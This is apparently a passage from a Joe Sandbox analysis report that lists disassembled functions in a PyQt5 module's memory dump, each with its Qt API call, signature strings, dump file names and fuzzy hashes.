Instruction Fuzzy Hash: 5A213BB2A0CB4682EB608F25E88426A77A8FF95B94F144176DA8D03B74DF3CE555CB00

Function 00007FFB9A2DD960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?resetInternalData@QAbstractItemModel@@IEAAXXZ.QT5CORE ref: 00007FFB9A2DD9FB

Strings

childEvent, xrefs: 00007FFB9A2DDA33
childEvent(self, a0: Optional[QChildEvent]), xrefs: 00007FFB9A2DDA27
BJ8, xrefs: 00007FFB9A2DD9B0
QStandardItemModel, xrefs: 00007FFB9A2DDA3A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?resetAbstractData@InternalItemModel@@
String ID: BJ8$QStandardItemModel$childEvent$childEvent(self, a0: Optional[QChildEvent])
API String ID: 59943102-3049280183
Opcode ID: a735deb8fa06ed8050697a9f5424275e74ab8adf0c5676d0cfc69e385323ebf9
Instruction ID: bec79f6e80a98b573d892b94a55b898d4612f6ff2063f43cdcb16c649deda4e5
Opcode Fuzzy Hash: a735deb8fa06ed8050697a9f5424275e74ab8adf0c5676d0cfc69e385323ebf9
Instruction Fuzzy Hash: F0216BB2A0DF46C1EB609B25E8842AA77A8FB85B84F545172DA8D07734EF3CE049D700

Function 00007FFB9A337930 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47COMMON

Download Yara Rule

APIs

?setClipPath@QPainter@@QEAAXAEBVQPainterPath@@W4ClipOperation@Qt@@@Z.QT5GUI ref: 00007FFB9A3379CD

Strings

BJ9|E, xrefs: 00007FFB9A337994
setClipPath, xrefs: 00007FFB9A3379FF
QPainter, xrefs: 00007FFB9A337A06
setClipPath(self, path: QPainterPath, operation: Qt.ClipOperation = Qt.ReplaceClip), xrefs: 00007FFB9A3379F3

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Clip$?setOperation@PainterPainter@@Path@Path@@Qt@@@
String ID: BJ9|E$QPainter$setClipPath$setClipPath(self, path: QPainterPath, operation: Qt.ClipOperation = Qt.ReplaceClip)
API String ID: 2717043895-730294478
Opcode ID: a0b77e5c3b8c17727ccb5d1e335821749a1632db6fd87bca2d9f66d14a218500
Instruction ID: fcb32bd64788d477a85107a46f9a151d27d6c658adc83409ba79e16bf7676023
Opcode Fuzzy Hash: a0b77e5c3b8c17727ccb5d1e335821749a1632db6fd87bca2d9f66d14a218500
Instruction Fuzzy Hash: 9321D2B6A18B56C5EB60CF25E8883A933A8FB49790F91417ACA9D43320DF39D959C700

Function 00007FFB9A355F00 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setText@QStandardItem@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFB9A355F70

Strings

setText, xrefs: 00007FFB9A355FC3
setText(self, atext: Optional[str]), xrefs: 00007FFB9A355FB7
BJ1, xrefs: 00007FFB9A355F15
QStandardItem, xrefs: 00007FFB9A355FCA

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setItem@@StandardString@@@Text@
String ID: BJ1$QStandardItem$setText$setText(self, atext: Optional[str])
API String ID: 3857957717-3918002662
Opcode ID: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
Instruction ID: 35cec2330dcb6ed3573be062aa8b85064e99ba9235ab1e8b09a481cb0a771112
Opcode Fuzzy Hash: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
Instruction Fuzzy Hash: 8921E8B6B08F56C1EB609F65E8881A933A8FB48B94F9180B6CE5D43720DF3DE549C740

Function 00007FFB9A355AA0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setTransform@QPainter@@QEAAXAEBVQTransform@@_N@Z.QT5GUI ref: 00007FFB9A355B2C

Strings

setTransform, xrefs: 00007FFB9A355B5E
BJ9|b, xrefs: 00007FFB9A355AF1
setTransform(self, transform: QTransform, combine: bool = False), xrefs: 00007FFB9A355B52
QPainter, xrefs: 00007FFB9A355B65

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setPainter@@Transform@Transform@@_
String ID: BJ9|b$QPainter$setTransform$setTransform(self, transform: QTransform, combine: bool = False)
API String ID: 2953993439-4023963478
Opcode ID: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
Instruction ID: fe1068a98db728ce0ff17a62eef537def5fe5b3f4c2f45d9899ffb25306018fe
Opcode Fuzzy Hash: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
Instruction Fuzzy Hash: EB2104B6B18F5685EB218F25E8882AD33B8FB48780F914176CAAD43720DF39D959C700

Function 00007FFB9A2F5B70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setPosition@QTextLayout@@QEAAXAEBVQPointF@@@Z.QT5GUI ref: 00007FFB9A2F5BE0

Strings

setPosition, xrefs: 00007FFB9A2F5C33
QTextLayout, xrefs: 00007FFB9A2F5C3A
BJ1, xrefs: 00007FFB9A2F5B85
setPosition(self, p: Union[QPointF, QPoint]), xrefs: 00007FFB9A2F5C27

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setF@@@Layout@@PointPosition@Text
String ID: BJ1$QTextLayout$setPosition$setPosition(self, p: Union[QPointF, QPoint])
API String ID: 321525979-1473786946
Opcode ID: a9db7711a7e8488f5321a71bccf9c4f1ebb888fabe64a16846c4869fd8119c04
Instruction ID: b83410348737ce07ef4b2bad6d009ce868632eeade3ec8d27ecf63a9810c54cd
Opcode Fuzzy Hash: a9db7711a7e8488f5321a71bccf9c4f1ebb888fabe64a16846c4869fd8119c04
Instruction Fuzzy Hash: D221E9B6B18F5681EB609F65E8881A933B8FB48B84F918176CE5D43320DF7DD549C740

Function 00007FFB9A2E58D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setHtml@QTextDocument@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFB9A2E5940

Strings

setHtml, xrefs: 00007FFB9A2E5993
BJ1, xrefs: 00007FFB9A2E58E5
QTextDocument, xrefs: 00007FFB9A2E599A
setHtml(self, html: Optional[str]), xrefs: 00007FFB9A2E5987

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setDocument@@Html@String@@@Text
String ID: BJ1$QTextDocument$setHtml$setHtml(self, html: Optional[str])
API String ID: 2191005602-266250314
Opcode ID: 2ebaaa27506286db65048bd1831073e41d0395f6069dca5d51276584e626dde5
Instruction ID: b5cc48c745b6e6c8c3b6325b364b3679bc9642db68f2065e3cb69b14ce1a30e6
Opcode Fuzzy Hash: 2ebaaa27506286db65048bd1831073e41d0395f6069dca5d51276584e626dde5
Instruction Fuzzy Hash: C021E7B6B08F56C1EB609F25E8881A933A8FB49B84F9181B6CE9D43320DF7DD559C740

Function 00007FFB9A3038B0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setDiscardCommand@QSessionManager@@QEAAXAEBVQStringList@@@Z.QT5GUI ref: 00007FFB9A303920

Strings

QSessionManager, xrefs: 00007FFB9A30397A
setDiscardCommand(self, a0: Iterable[Optional[str]]), xrefs: 00007FFB9A303967
setDiscardCommand, xrefs: 00007FFB9A303973
BJ1, xrefs: 00007FFB9A3038C5

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setCommand@DiscardList@@@Manager@@SessionString
String ID: BJ1$QSessionManager$setDiscardCommand$setDiscardCommand(self, a0: Iterable[Optional[str]])
API String ID: 709668538-2485378439
Opcode ID: 65bb031d51951a060c30fad87d3a943cbca37c52a262cfa0f4cae2c0a0c0d2e8
Instruction ID: 3cf733a85844ca22ae0d1ecd9c02de15eef4a3f45de5860b547f470f5b34f9e2
Opcode Fuzzy Hash: 65bb031d51951a060c30fad87d3a943cbca37c52a262cfa0f4cae2c0a0c0d2e8
Instruction Fuzzy Hash: 662107B6B08F56C0EB609F65E8881A933A8FB58B80F9181B6CE9D43720DF3DD549C740

Function 00007FFB9A301910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setFileName@QPictureIO@@QEAAXAEBVQString@@@Z.QT5GUI ref: 00007FFB9A301980

Strings

setFileName, xrefs: 00007FFB9A3019D3
BJ1, xrefs: 00007FFB9A301925
QPictureIO, xrefs: 00007FFB9A3019DA
setFileName(self, a0: Optional[str]), xrefs: 00007FFB9A3019C7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setFileName@PictureString@@@
String ID: BJ1$QPictureIO$setFileName$setFileName(self, a0: Optional[str])
API String ID: 3214566917-123792022
Opcode ID: bd4cdeceed91f6762166c2767631444ac2120b65c46703ba11cb66e490bbf2ab
Instruction ID: 03a2cd63ec1d9841aabbf8052163faf84398a1aa9c92e09931f68d9fa02c760b
Opcode Fuzzy Hash: bd4cdeceed91f6762166c2767631444ac2120b65c46703ba11cb66e490bbf2ab
Instruction Fuzzy Hash: D421F5B6B08B56C0EB609B21E8885A933A8FB49B94F9180B6CA9D43320DF7DD549C740

Function 00007FFB9A2F7950 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?setFormats@QTextLayout@@QEAAXAEBV?$QVector@UFormatRange@QTextLayout@@@@@Z.QT5GUI ref: 00007FFB9A2F79C0

Strings

QTextLayout, xrefs: 00007FFB9A2F7A1A
setFormats, xrefs: 00007FFB9A2F7A13
BJ1, xrefs: 00007FFB9A2F7965
setFormats(self, overrides: Iterable[QTextLayout.FormatRange]), xrefs: 00007FFB9A2F7A07

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?setFormatFormats@Layout@@Layout@@@@@Range@Vector@
String ID: BJ1$QTextLayout$setFormats$setFormats(self, overrides: Iterable[QTextLayout.FormatRange])
API String ID: 2978315198-3499376178
Opcode ID: ad41754c563ba37af9bfe682f7e6f241ef3bc75f8fc0d4bab2327b6258424d2d
Instruction ID: d6333817cb7e78dcdb2f69e9ed7ae04c2cf755c75ab8bdaec212805e69ed8721
Opcode Fuzzy Hash: ad41754c563ba37af9bfe682f7e6f241ef3bc75f8fc0d4bab2327b6258424d2d
Instruction Fuzzy Hash: BC2118B6B08F46C0EB209F25E8881A933A8FB49B84F9181B6CE9D43320DF3DD549C740

Function 00007FFB9A2E3920 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 45COMMON

Download Yara Rule

APIs

?fill@?$QVector@VQPoint@@@@QEAAAEAV1@AEBVQPoint@@H@Z.QT5CORE ref: 00007FFB9A2E39AF

Strings

fill(self, value: QPoint, size: int = -1), xrefs: 00007FFB9A2E39D5
QPolygon, xrefs: 00007FFB9A2E39E8
